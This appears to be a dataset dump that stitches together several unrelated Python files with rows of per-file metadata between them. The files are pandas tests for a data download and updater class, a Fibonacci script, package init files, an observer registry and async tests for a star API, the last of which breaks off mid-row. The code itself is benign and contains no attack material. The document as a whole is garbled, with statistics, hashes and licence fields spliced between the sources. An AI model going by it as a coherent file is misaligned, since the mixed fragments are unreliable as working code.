                    [1.7080725777960455, 1.020584494295802447, np.nan],
                    [np.nan, np.nan, np.nan],
                    [1.2405896199653488, 1.3271390558111398, np.nan]
                ],
                index=index2
            )
        )
        pd.testing.assert_frame_equal(
            MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
                            missing_index='drop', missing_columns='drop')
            .update(index_mask=update_index_mask).data[0],
            pd.DataFrame(
                [
                    [0.15601864044243652],
                    [0.8661761457749352],
                    [0.020584494295802447]
                ],
                index=index[1:4],
                columns=pd.Int64Index([1], dtype='int64')
            )
        )
        pd.testing.assert_frame_equal(
            MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
                            missing_index='drop', missing_columns='drop')
            .update(index_mask=update_index_mask).data[1],
            pd.DataFrame(
                [
                    [1.15601864044243652],
                    [1.8661761457749352],
                    [1.020584494295802447]
                ],
                index=index[1:4],
                columns=pd.Int64Index([1], dtype='int64')
            )
        )
        pd.testing.assert_frame_equal(
            MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
                            missing_index='drop', missing_columns='drop')
            .update(n=2, index_mask=update_index_mask2).data[0],
            pd.DataFrame(
                [
                    [0.15601864044243652],
                    [0.8661761457749352],
                    [0.020584494295802447]
                ],
                index=index[1:4],
                columns=pd.Int64Index([1], dtype='int64')
            )
        )
        pd.testing.assert_frame_equal(
            MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
                            missing_index='drop', missing_columns='drop')
            .update(n=2, index_mask=update_index_mask2).data[1],
            pd.DataFrame(
                [
                    [1.15601864044243652],
                    [1.8661761457749352],
                    [1.020584494295802447]
                ],
                index=index[1:4],
                columns=pd.Int64Index([1], dtype='int64')
            )
        )
    def test_concat(self):
        """concat() must return one object per feature, with symbols as
        columns (multi-symbol) or a single named Series (single symbol)."""
        index = pd.DatetimeIndex(
            ['2020-01-01', '2020-01-02', '2020-01-03', '2020-01-04', '2020-01-05'],
            dtype='datetime64[ns]',
            freq='D'
        )
        pd.testing.assert_series_equal(
            MyData.download(0, shape=(5,), columns='feat0').concat()['feat0'],
            pd.Series(
                [
                    0.3745401188473625,
                    0.9507143064099162,
                    0.7319939418114051,
                    0.5986584841970366,
                    0.15601864044243652
                ],
                index=index,
                name=0
            )
        )
        pd.testing.assert_frame_equal(
            MyData.download([0, 1], shape=(5,), columns='feat0').concat()['feat0'],
            pd.DataFrame(
                [
                    [0.3745401188473625, 1.3745401188473625],
                    [0.9507143064099162, 1.9507143064099162],
                    [0.7319939418114051, 1.7319939418114051],
                    [0.5986584841970366, 1.5986584841970366],
                    [0.15601864044243652, 1.15601864044243652]
                ],
                index=index,
                columns=pd.Int64Index([0, 1], dtype='int64', name='symbol')
            )
        )
        pd.testing.assert_series_equal(
            MyData.download(0, shape=(5, 3), columns=['feat0', 'feat1', 'feat2']).concat()['feat0'],
            pd.Series(
                [
                    0.3745401188473625,
                    0.5986584841970366,
                    0.05808361216819946,
                    0.7080725777960455,
                    0.8324426408004217
                ],
                index=index,
                name=0
            )
        )
        pd.testing.assert_series_equal(
            MyData.download(0, shape=(5, 3), columns=['feat0', 'feat1', 'feat2']).concat()['feat1'],
            pd.Series(
                [
                    0.9507143064099162,
                    0.15601864044243652,
                    0.8661761457749352,
                    0.020584494295802447,
                    0.21233911067827616
                ],
                index=index,
                name=0
            )
        )
        pd.testing.assert_series_equal(
            MyData.download(0, shape=(5, 3), columns=['feat0', 'feat1', 'feat2']).concat()['feat2'],
            pd.Series(
                [
                    0.7319939418114051,
                    0.15599452033620265,
                    0.6011150117432088,
                    0.9699098521619943,
                    0.18182496720710062
                ],
                index=index,
                name=0
            )
        )
        pd.testing.assert_frame_equal(
            MyData.download([0, 1], shape=(5, 3), columns=['feat0', 'feat1', 'feat2']).concat()['feat0'],
            pd.DataFrame(
                [
                    [0.3745401188473625, 1.3745401188473625],
                    [0.5986584841970366, 1.5986584841970366],
                    [0.05808361216819946, 1.05808361216819946],
                    [0.7080725777960455, 1.7080725777960455],
                    [0.8324426408004217, 1.8324426408004217]
                ],
                index=index,
                columns=pd.Int64Index([0, 1], dtype='int64', name='symbol')
            )
        )
        pd.testing.assert_frame_equal(
            MyData.download([0, 1], shape=(5, 3), columns=['feat0', 'feat1', 'feat2']).concat()['feat1'],
            pd.DataFrame(
                [
                    [0.9507143064099162, 1.9507143064099162],
                    [0.15601864044243652, 1.15601864044243652],
                    [0.8661761457749352, 1.8661761457749352],
                    [0.020584494295802447, 1.020584494295802447],
                    [0.21233911067827616, 1.21233911067827616]
                ],
                index=index,
                columns=pd.Int64Index([0, 1], dtype='int64', name='symbol')
            )
        )
        pd.testing.assert_frame_equal(
            MyData.download([0, 1], shape=(5, 3), columns=['feat0', 'feat1', 'feat2']).concat()['feat2'],
            pd.DataFrame(
                [
                    [0.7319939418114051, 1.7319939418114051],
                    [0.15599452033620265, 1.15599452033620265],
                    [0.6011150117432088, 1.6011150117432088],
                    [0.9699098521619943, 1.9699098521619943],
                    [0.18182496720710062, 1.18182496720710062]
                ],
                index=index,
                columns=pd.Int64Index([0, 1], dtype='int64', name='symbol')
            )
        )
    def test_get(self):
        """get() must return full data, a single feature, or a tuple of
        features, keyed by symbol when multiple symbols were downloaded."""
        index = pd.DatetimeIndex(
            ['2020-01-01', '2020-01-02', '2020-01-03', '2020-01-04', '2020-01-05'],
            dtype='datetime64[ns]',
            freq='D'
        )
        pd.testing.assert_series_equal(
            MyData.download(0, shape=(5,), columns='feat0').get(),
            pd.Series(
                [
                    0.3745401188473625,
                    0.9507143064099162,
                    0.7319939418114051,
                    0.5986584841970366,
                    0.15601864044243652
                ],
                index=index,
                name='feat0'
            )
        )
        pd.testing.assert_frame_equal(
            MyData.download(0, shape=(5, 3), columns=['feat0', 'feat1', 'feat2']).get(),
            pd.DataFrame(
                [
                    [0.3745401188473625, 0.9507143064099162, 0.7319939418114051],
                    [0.5986584841970366, 0.15601864044243652, 0.15599452033620265],
                    [0.05808361216819946, 0.8661761457749352, 0.6011150117432088],
                    [0.7080725777960455, 0.020584494295802447, 0.9699098521619943],
                    [0.8324426408004217, 0.21233911067827616, 0.18182496720710062]
                ],
                index=index,
                columns=pd.Index(['feat0', 'feat1', 'feat2'], dtype='object')
            )
        )
        pd.testing.assert_series_equal(
            MyData.download(0, shape=(5, 3), columns=['feat0', 'feat1', 'feat2']).get('feat0'),
            pd.Series(
                [
                    0.3745401188473625,
                    0.5986584841970366,
                    0.05808361216819946,
                    0.7080725777960455,
                    0.8324426408004217
                ],
                index=index,
                name='feat0'
            )
        )
        pd.testing.assert_frame_equal(
            MyData.download([0, 1], shape=(5,), columns='feat0').get(),
            pd.DataFrame(
                [
                    [0.3745401188473625, 1.3745401188473625],
                    [0.9507143064099162, 1.9507143064099162],
                    [0.7319939418114051, 1.7319939418114051],
                    [0.5986584841970366, 1.5986584841970366],
                    [0.15601864044243652, 1.15601864044243652]
                ],
                index=index,
                columns=pd.Int64Index([0, 1], dtype='int64', name='symbol')
            )
        )
        pd.testing.assert_frame_equal(
            MyData.download([0, 1], shape=(5, 3), columns=['feat0', 'feat1', 'feat2']).get('feat0'),
            pd.DataFrame(
                [
                    [0.3745401188473625, 1.3745401188473625],
                    [0.5986584841970366, 1.5986584841970366],
                    [0.05808361216819946, 1.05808361216819946],
                    [0.7080725777960455, 1.7080725777960455],
                    [0.8324426408004217, 1.8324426408004217]
                ],
                index=index,
                columns=pd.Int64Index([0, 1], dtype='int64', name='symbol')
            )
        )
        pd.testing.assert_frame_equal(
            MyData.download([0, 1], shape=(5, 3), columns=['feat0', 'feat1', 'feat2']).get(['feat0', 'feat1'])[0],
            pd.DataFrame(
                [
                    [0.3745401188473625, 1.3745401188473625],
                    [0.5986584841970366, 1.5986584841970366],
                    [0.05808361216819946, 1.05808361216819946],
                    [0.7080725777960455, 1.7080725777960455],
                    [0.8324426408004217, 1.8324426408004217]
                ],
                index=index,
                columns=pd.Int64Index([0, 1], dtype='int64', name='symbol')
            )
        )
        pd.testing.assert_frame_equal(
            MyData.download([0, 1], shape=(5, 3), columns=['feat0', 'feat1', 'feat2']).get()[0],
            pd.DataFrame(
                [
                    [0.3745401188473625, 1.3745401188473625],
                    [0.5986584841970366, 1.5986584841970366],
                    [0.05808361216819946, 1.05808361216819946],
                    [0.7080725777960455, 1.7080725777960455],
                    [0.8324426408004217, 1.8324426408004217]
                ],
                index=index,
                columns=pd.Int64Index([0, 1], dtype='int64', name='symbol')
            )
        )
    def test_indexing(self):
        """Row (iloc) and column selection must produce wrappers equal to a
        direct download of the reduced shape."""
        assert MyData.download([0, 1], shape=(5,), columns='feat0').iloc[:3].wrapper == \
               MyData.download([0, 1], shape=(3,), columns='feat0').wrapper
        assert MyData.download([0, 1], shape=(5, 3), columns=['feat0', 'feat1', 'feat2']).iloc[:3].wrapper == \
               MyData.download([0, 1], shape=(3, 3), columns=['feat0', 'feat1', 'feat2']).wrapper
        assert MyData.download([0, 1], shape=(5, 3), columns=['feat0', 'feat1', 'feat2'])['feat0'].wrapper == \
               MyData.download([0, 1], shape=(5,), columns='feat0').wrapper
        assert MyData.download([0, 1], shape=(5, 3), columns=['feat0', 'feat1', 'feat2'])[['feat0']].wrapper == \
               MyData.download([0, 1], shape=(5, 1), columns=['feat0']).wrapper
# ############# updater.py ############# #
class TestDataUpdater:
    """Tests for `vbt.DataUpdater` driving updates of `MyData`."""
    def test_update(self):
        """One manual updater.update() must equal one data.update()."""
        data = MyData.download(0, shape=(5,), return_arr=True)
        updater = vbt.DataUpdater(data)
        updater.update()
        assert updater.data == data.update()
        assert updater.config['data'] == data.update()
    def test_update_every(self):
        """A scheduled updater that cancels itself after 5 calls must match
        5 manual updates."""
        data = MyData.download(0, shape=(5,), return_arr=True)
        kwargs = dict(call_count=0)
        class DataUpdater(vbt.DataUpdater):
            # Counts calls via the shared `kwargs` dict and raises
            # CancelledError on the 5th call to stop the schedule.
            def update(self, kwargs):
                super().update()
                kwargs['call_count'] += 1
                if kwargs['call_count'] == 5:
                    raise vbt.CancelledError
        updater = DataUpdater(data)
        updater.update_every(kwargs=kwargs)
        for i in range(5):
            data = data.update()
        assert updater.data == data
        assert updater.config['data'] == data
| 40.067016
| 114
| 0.481131
| 3,400
| 38,264
| 5.302353
| 0.047059
| 0.043932
| 0.059907
| 0.063235
| 0.882072
| 0.863157
| 0.858553
| 0.849512
| 0.84696
| 0.842467
| 0
| 0.343158
| 0.401474
| 38,264
| 954
| 115
| 40.109015
| 0.444022
| 0.000549
| 0
| 0.631974
| 0
| 0
| 0.035958
| 0
| 0
| 0
| 0
| 0
| 0.071888
| 1
| 0.011803
| false
| 0
| 0.006438
| 0
| 0.026824
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
57a8a94ab86edc3e4b4b8db25ceddf36b46398b5
| 86
|
py
|
Python
|
MARG Python Assignment 1 Answers/question3.py
|
StuartSul/MARG-Python-Study-2020-Assignments
|
11530c7213c0e9bd781a5f11802346003b6ec543
|
[
"CNRI-Python"
] | null | null | null |
MARG Python Assignment 1 Answers/question3.py
|
StuartSul/MARG-Python-Study-2020-Assignments
|
11530c7213c0e9bd781a5f11802346003b6ec543
|
[
"CNRI-Python"
] | null | null | null |
MARG Python Assignment 1 Answers/question3.py
|
StuartSul/MARG-Python-Study-2020-Assignments
|
11530c7213c0e9bd781a5f11802346003b6ec543
|
[
"CNRI-Python"
] | null | null | null |
# Print the Fibonacci sequence (0, 1, 1, 2, 3, ...) for all terms below 10**8.
current, following = 0, 1
while current < 10**8:
    print(current)
    current, following = following, current + following
| 14.333333
| 20
| 0.372093
| 23
| 86
| 1.391304
| 0.347826
| 0.1875
| 0.1875
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.225806
| 0.27907
| 86
| 5
| 21
| 17.2
| 0.290323
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.2
| 1
| 0
| 1
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
57b07c5e02096bf152127f2be6908d399c4aff75
| 29
|
py
|
Python
|
python_i2c_mpu9250/__init__.py
|
danrs/python_i2c_mpu9250
|
a0e222b9a0024db3999325c5db3aff6126c20476
|
[
"MIT"
] | 3
|
2016-09-28T04:10:59.000Z
|
2019-04-20T21:41:35.000Z
|
python_i2c_mpu9250/__init__.py
|
danrs/python_i2c_mpu9250
|
a0e222b9a0024db3999325c5db3aff6126c20476
|
[
"MIT"
] | null | null | null |
python_i2c_mpu9250/__init__.py
|
danrs/python_i2c_mpu9250
|
a0e222b9a0024db3999325c5db3aff6126c20476
|
[
"MIT"
] | 1
|
2019-10-03T15:18:26.000Z
|
2019-10-03T15:18:26.000Z
|
from .mpu9250 import mpu9250
| 14.5
| 28
| 0.827586
| 4
| 29
| 6
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.32
| 0.137931
| 29
| 1
| 29
| 29
| 0.64
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
57fd99c1478b23754ecc28fc342870429574f193
| 60
|
py
|
Python
|
python/main.py
|
robotlightsyou/test
|
015f13943fc402d8ce86c5f6d2f5a7d032b3340a
|
[
"MIT"
] | 2
|
2019-05-26T15:09:34.000Z
|
2021-09-12T08:01:23.000Z
|
python/main.py
|
robotlightsyou/test
|
015f13943fc402d8ce86c5f6d2f5a7d032b3340a
|
[
"MIT"
] | null | null | null |
python/main.py
|
robotlightsyou/test
|
015f13943fc402d8ce86c5f6d2f5a7d032b3340a
|
[
"MIT"
] | 1
|
2021-04-11T20:28:21.000Z
|
2021-04-11T20:28:21.000Z
|
def __main__(*args, **kwds):
print('MAIN!', args, kwds)
| 20
| 30
| 0.6
| 8
| 60
| 4
| 0.625
| 0.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 60
| 2
| 31
| 30
| 0.64
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
17b828b4e6c2e1caa3061063e501a6409d9e05bc
| 59
|
py
|
Python
|
bettermaxtools/__init__.py
|
thomascswalker/bettergameexporter
|
4db3683a599d523e28c2f93bdcac889277130153
|
[
"MIT"
] | null | null | null |
bettermaxtools/__init__.py
|
thomascswalker/bettergameexporter
|
4db3683a599d523e28c2f93bdcac889277130153
|
[
"MIT"
] | null | null | null |
bettermaxtools/__init__.py
|
thomascswalker/bettergameexporter
|
4db3683a599d523e28c2f93bdcac889277130153
|
[
"MIT"
] | null | null | null |
from .maxruntime import rt
from .maxruntime import maxhwnd
| 19.666667
| 31
| 0.830508
| 8
| 59
| 6.125
| 0.625
| 0.571429
| 0.816327
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.135593
| 59
| 2
| 32
| 29.5
| 0.960784
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
aa077095aba849967e942214a08b87bd20c785e5
| 189
|
py
|
Python
|
src/core/bot/models/__init__.py
|
xcad2k/disrapid
|
44aef95d181cc9cddfddfba2b03517209efe4481
|
[
"MIT"
] | 13
|
2020-05-29T15:32:22.000Z
|
2022-01-20T12:38:44.000Z
|
src/core/bot/models/__init__.py
|
xcad2k/disrapid
|
44aef95d181cc9cddfddfba2b03517209efe4481
|
[
"MIT"
] | 16
|
2020-06-02T15:14:14.000Z
|
2021-07-29T10:04:55.000Z
|
src/core/bot/models/__init__.py
|
xcad2k/disrapid
|
44aef95d181cc9cddfddfba2b03517209efe4481
|
[
"MIT"
] | 4
|
2020-06-02T15:06:27.000Z
|
2021-09-29T23:56:43.000Z
|
# Shared SQLAlchemy declarative base for all model modules in this package.
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
# Re-export the model classes so consumers can import them from this package.
from .guild import * # noqa: 401
from .youtube import * # noqa: 401
from .welcome import * # noqa: 401
| 27
| 55
| 0.740741
| 25
| 189
| 5.52
| 0.44
| 0.217391
| 0.282609
| 0.246377
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.057325
| 0.169312
| 189
| 6
| 56
| 31.5
| 0.821656
| 0.153439
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.8
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
aa0eba0ef1124d7389b37cd578089cc5c0174daf
| 1,210
|
py
|
Python
|
tug_diagnosis/tug_diagnosis/scripts/pymbd/benchmark/tug_description_parser/observer.py
|
annajohny/sdp
|
2f66e226fc335ae357001d07fbc74d30ab469509
|
[
"BSD-3-Clause"
] | null | null | null |
tug_diagnosis/tug_diagnosis/scripts/pymbd/benchmark/tug_description_parser/observer.py
|
annajohny/sdp
|
2f66e226fc335ae357001d07fbc74d30ab469509
|
[
"BSD-3-Clause"
] | null | null | null |
tug_diagnosis/tug_diagnosis/scripts/pymbd/benchmark/tug_description_parser/observer.py
|
annajohny/sdp
|
2f66e226fc335ae357001d07fbc74d30ab469509
|
[
"BSD-3-Clause"
] | null | null | null |
# Registry mapping an observer type name to its implementing class.
# NOTE(review): nothing in this chunk populates the registry — presumably
# observer modules register themselves at import time; verify upstream.
OBSERVERS = {}


def generate_model_parameter(config,
                             topics_published_from_nodes,
                             topics_subscribed_from_nodes,
                             nodes_publish_topics,
                             nodes_subscribe_topics):
    """Dispatch model-parameter generation to the observer registered
    under ``config.type``.

    Raises KeyError when no observer is registered for that type.
    """
    # Removed a commented-out duplicate of this call that keyed the registry
    # by config['type'] — the live code uses attribute access (config.type).
    return OBSERVERS[config.type].generate_model_parameter(config,
                                                           topics_published_from_nodes,
                                                           topics_subscribed_from_nodes,
                                                           nodes_publish_topics,
                                                           nodes_subscribe_topics)


def decrypt_resource_info(obs):
    """Decrypt a resource-info pair ``(observer_type, payload)`` by delegating
    to the observer registered under its type."""
    return OBSERVERS[obs[0]].decrypt_resource_info(obs[1])
| 52.608696
| 93
| 0.424793
| 78
| 1,210
| 6.076923
| 0.269231
| 0.113924
| 0.139241
| 0.177215
| 0.833333
| 0.833333
| 0.833333
| 0.833333
| 0.833333
| 0.833333
| 0
| 0.003546
| 0.533884
| 1,210
| 22
| 94
| 55
| 0.836879
| 0.332231
| 0
| 0.461538
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.153846
| false
| 0
| 0
| 0.153846
| 0.307692
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 10
|
aa28607309d011843431efbfabaaf6670fd2b043
| 8,644
|
py
|
Python
|
be/src/dsp_be/routes/test/stars_test.py
|
koadjunky/dsp-manager
|
fb181c184aaca393a036556c54eb64bd89c75100
|
[
"MIT"
] | null | null | null |
be/src/dsp_be/routes/test/stars_test.py
|
koadjunky/dsp-manager
|
fb181c184aaca393a036556c54eb64bd89c75100
|
[
"MIT"
] | null | null | null |
be/src/dsp_be/routes/test/stars_test.py
|
koadjunky/dsp-manager
|
fb181c184aaca393a036556c54eb64bd89c75100
|
[
"MIT"
] | null | null | null |
from typing import List, Optional
from unittest.mock import ANY
import pytest
from httpx import AsyncClient
from requests import Response
async def create_star(
    client: AsyncClient,
    name: str,
    imports: Optional[List[str]] = None,
    exports: Optional[List[str]] = None,
) -> Response:
    """POST a new star named `name`; omitted imports/exports default to [].

    Fixed annotations: the defaults are None, so the parameters are
    Optional[List[str]], not List[str] (Optional is already imported above).
    """
    imports_list = imports if imports is not None else []
    exports_list = exports if exports is not None else []
    request = {"name": name, "imports": imports_list, "exports": exports_list}
    return await client.post("/dsp/api/stars/", json=request)
async def read_star(client: AsyncClient, name: str) -> Response:
    """GET a single star by its name."""
    endpoint = f"/dsp/api/stars/{name}"
    return await client.get(endpoint)
async def update_star(
    client: AsyncClient,
    id: str,
    name: str,
    imports: Optional[List[str]] = None,
    exports: Optional[List[str]] = None,
) -> Response:
    """PUT an updated star identified by `id`; omitted imports/exports default to [].

    Fixed annotations: the defaults are None, so the parameters are
    Optional[List[str]], not List[str] (Optional is already imported above).
    """
    imports_list = imports if imports is not None else []
    exports_list = exports if exports is not None else []
    request = {"id": id, "name": name, "imports": imports_list, "exports": exports_list}
    return await client.put("/dsp/api/stars/", json=request)
async def delete_star(client: AsyncClient, name: str) -> Optional[Response]:
    """Delete the star called *name*, resolving its id first.

    Returns None when the star cannot be read or carries no ``id`` field.
    """
    lookup = await read_star(client, name)
    if lookup.status_code != 200:
        return None
    payload = lookup.json()
    if "id" not in payload:
        return None
    return await delete_star_id(client, payload["id"])
async def delete_star_id(client: AsyncClient, id_: str) -> Response:
    """Issue a DELETE for the star with database id *id_*."""
    target = f"/dsp/api/stars/{id_}"
    return await client.delete(target)
# Star names used as fixtures throughout the API tests below.
TEST_STAR = "Test Star"
TEST_STAR_1 = "Other Star"
@pytest.mark.anyio
async def test_create_star(async_client: AsyncClient) -> None:
    """Creating a star succeeds and the star is readable afterwards."""
    create_resp = await create_star(async_client, TEST_STAR)
    assert create_resp.status_code == 200
    read_resp = await read_star(async_client, TEST_STAR)
    assert read_resp.status_code == 200
    expected = {
        "name": TEST_STAR,
        "imports": [],
        "exports": [],
        "planets": [],
        "trade": {},
        "id": ANY,
    }
    assert read_resp.json() == expected
@pytest.mark.anyio
async def test_create_star_duplicate_name(async_client: AsyncClient) -> None:
    """A second star with an existing name is rejected; the original is kept."""
    await create_star(async_client, TEST_STAR, imports=["iron_ingot"])
    dup_resp = await create_star(async_client, TEST_STAR)
    assert dup_resp.status_code != 200
    read_resp = await read_star(async_client, TEST_STAR)
    assert read_resp.status_code == 200
    expected = {
        "name": TEST_STAR,
        "imports": ["iron_ingot"],
        "exports": [],
        "planets": [],
        "trade": {},
        "id": ANY,
    }
    assert read_resp.json() == expected
@pytest.mark.anyio
async def test_create_star_empty_name(async_client: AsyncClient) -> None:
    """An empty star name is rejected by the API."""
    resp = await create_star(async_client, "")
    assert resp.status_code != 200
@pytest.mark.anyio
async def test_create_star_import_export(async_client: AsyncClient) -> None:
    """Imports and exports supplied at creation time are persisted."""
    create_resp = await create_star(
        async_client, TEST_STAR, imports=["iron_ingot"], exports=["copper_ingot"]
    )
    assert create_resp.status_code == 200
    read_resp = await read_star(async_client, TEST_STAR)
    assert read_resp.status_code == 200
    expected = {
        "name": TEST_STAR,
        "imports": ["iron_ingot"],
        "exports": ["copper_ingot"],
        "planets": [],
        "trade": {},
        "id": ANY,
    }
    assert read_resp.json() == expected
@pytest.mark.anyio
async def test_create_star_wrong_imports(async_client: AsyncClient) -> None:
    """An unknown import resource aborts creation entirely."""
    resp = await create_star(async_client, TEST_STAR, imports=["bad_resource"])
    assert resp.status_code != 200
    resp = await read_star(async_client, TEST_STAR)
    assert resp.status_code != 200
@pytest.mark.anyio
async def test_create_star_wrong_exports(async_client: AsyncClient) -> None:
    """An unknown export resource aborts creation entirely."""
    resp = await create_star(async_client, TEST_STAR, exports=["bad_resource"])
    assert resp.status_code != 200
    resp = await read_star(async_client, TEST_STAR)
    assert resp.status_code != 200
@pytest.mark.anyio
async def test_update_star(async_client: AsyncClient) -> None:
    """Updating renames the star and replaces its import/export lists."""
    await create_star(async_client, TEST_STAR)
    star_id = (await read_star(async_client, TEST_STAR)).json()["id"]
    update_resp = await update_star(
        async_client,
        id=star_id,
        name=TEST_STAR_1,
        imports=["iron_ingot"],
        exports=["copper_ingot"],
    )
    assert update_resp.status_code == 200
    read_resp = await read_star(async_client, TEST_STAR_1)
    assert read_resp.status_code == 200
    expected = {
        "name": TEST_STAR_1,
        "imports": ["iron_ingot"],
        "exports": ["copper_ingot"],
        "planets": [],
        "trade": {},
        "id": ANY,
    }
    assert read_resp.json() == expected
@pytest.mark.anyio
async def test_update_star_duplicate_name(async_client: AsyncClient) -> None:
    """Renaming onto an existing name fails and both stars stay intact."""
    await create_star(async_client, TEST_STAR_1)
    await create_star(async_client, TEST_STAR, imports=["iron_ingot"])
    star_id = (await read_star(async_client, TEST_STAR)).json()["id"]
    update_resp = await update_star(
        async_client,
        id=star_id,
        name=TEST_STAR_1,
        imports=["iron_ingot"],
        exports=["copper_ingot"],
    )
    assert update_resp.status_code != 200
    # The star we tried to rename is unchanged.
    read_resp = await read_star(async_client, TEST_STAR)
    assert read_resp.status_code == 200
    assert read_resp.json() == {
        "name": TEST_STAR,
        "imports": ["iron_ingot"],
        "exports": [],
        "planets": [],
        "trade": {},
        "id": ANY,
    }
    # The star whose name we collided with is unchanged too.
    read_resp = await read_star(async_client, TEST_STAR_1)
    assert read_resp.status_code == 200
    assert read_resp.json() == {
        "name": TEST_STAR_1,
        "imports": [],
        "exports": [],
        "planets": [],
        "trade": {},
        "id": ANY,
    }
@pytest.mark.anyio
async def test_update_star_empty_name(async_client: AsyncClient) -> None:
    """An update with an empty name is rejected and nothing changes."""
    await create_star(async_client, TEST_STAR)
    star_id = (await read_star(async_client, TEST_STAR)).json()["id"]
    update_resp = await update_star(
        async_client, id=star_id, name="", imports=["iron_ingot"], exports=["copper_ingot"]
    )
    assert update_resp.status_code != 200
    read_resp = await read_star(async_client, TEST_STAR)
    assert read_resp.status_code == 200
    assert read_resp.json() == {
        "name": TEST_STAR,
        "imports": [],
        "exports": [],
        "planets": [],
        "trade": {},
        "id": ANY,
    }
@pytest.mark.anyio
async def test_update_star_wrong_imports(async_client: AsyncClient) -> None:
    """An update with an unknown import resource is rejected atomically."""
    await create_star(async_client, TEST_STAR)
    star_id = (await read_star(async_client, TEST_STAR)).json()["id"]
    update_resp = await update_star(
        async_client, id=star_id, name=TEST_STAR, imports=["bad_resource"], exports=[]
    )
    assert update_resp.status_code != 200
    read_resp = await read_star(async_client, TEST_STAR)
    assert read_resp.status_code == 200
    assert read_resp.json() == {
        "name": TEST_STAR,
        "imports": [],
        "exports": [],
        "planets": [],
        "trade": {},
        "id": ANY,
    }
@pytest.mark.anyio
async def test_update_star_wrong_exports(async_client: AsyncClient) -> None:
    """An update with an unknown export resource is rejected atomically."""
    await create_star(async_client, TEST_STAR)
    star_id = (await read_star(async_client, TEST_STAR)).json()["id"]
    update_resp = await update_star(
        async_client, id=star_id, name=TEST_STAR, imports=[], exports=["bad_resource"]
    )
    assert update_resp.status_code != 200
    read_resp = await read_star(async_client, TEST_STAR)
    assert read_resp.status_code == 200
    assert read_resp.json() == {
        "name": TEST_STAR,
        "imports": [],
        "exports": [],
        "planets": [],
        "trade": {},
        "id": ANY,
    }
@pytest.mark.anyio
async def test_delete_star(async_client: AsyncClient) -> None:
    """Deleting by id removes the star from subsequent reads."""
    await create_star(async_client, TEST_STAR)
    read_resp = await read_star(async_client, TEST_STAR)
    assert read_resp.status_code == 200
    star_id = read_resp.json()["id"]
    assert (await delete_star_id(async_client, star_id)).status_code == 200
    assert (await read_star(async_client, TEST_STAR)).status_code != 200
@pytest.mark.anyio
async def test_delete_not_existing_star(async_client: AsyncClient) -> None:
    """Deleting an already-deleted star is idempotent (still returns 200)."""
    await create_star(async_client, TEST_STAR)
    read_resp = await read_star(async_client, TEST_STAR)
    assert read_resp.status_code == 200
    star_id = read_resp.json()["id"]
    assert (await delete_star_id(async_client, star_id)).status_code == 200
    # Second delete of the same id must not fail.
    assert (await delete_star_id(async_client, star_id)).status_code == 200
| 31.318841
| 88
| 0.656293
| 1,072
| 8,644
| 5.024254
